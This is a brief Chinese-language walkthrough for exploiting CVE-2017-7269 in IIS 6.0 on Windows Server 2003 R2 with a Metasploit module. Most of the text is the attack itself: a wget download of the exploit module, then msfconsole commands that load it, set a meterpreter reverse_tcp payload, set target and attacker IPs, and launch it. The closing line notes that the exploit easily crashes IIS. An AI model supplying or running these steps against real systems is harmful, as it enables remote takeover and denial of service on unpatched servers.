https://github.com/dmchell/metasploit-framework/blob/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

漏洞分析：

http://blog.nsfocus.net/windows-server-2003-r2-iis-6-0-vulnerability-protection-scenario/?utm_source=tuicool&utm_medium=referral

简单说一下使用方法：

本机：kali2.0

目标机器：win2003 r2 iis6

下载利用脚本：

wget https://raw.githubusercontent.com/dmchell/metasploit-framework/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

复制到 msf 目录下（可能每个人 msf 安装路径不同，请根据自身情况进行修改）：

cp cve-2017-7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

打开 msf  命令是：msfconsole

use exploit/windows/iis/cve-2017-7269  /* 加载 exp*/
set PAYLOAD windows/meterpreter/reverse_tcp /* 加载 payload*/
show options /* 查看利用条件 */

set RHOST 192.168.33.139 /*RHOST 是目标 ip*/
set LHOST 192.168.33.137/*LHOST 是本机 ip*/
exploit /* 开始攻击 */

这 poc 容易把 IIS 搞死且只能用一次，再用就会返回 400 错误，服务器重启之后才能再次利用。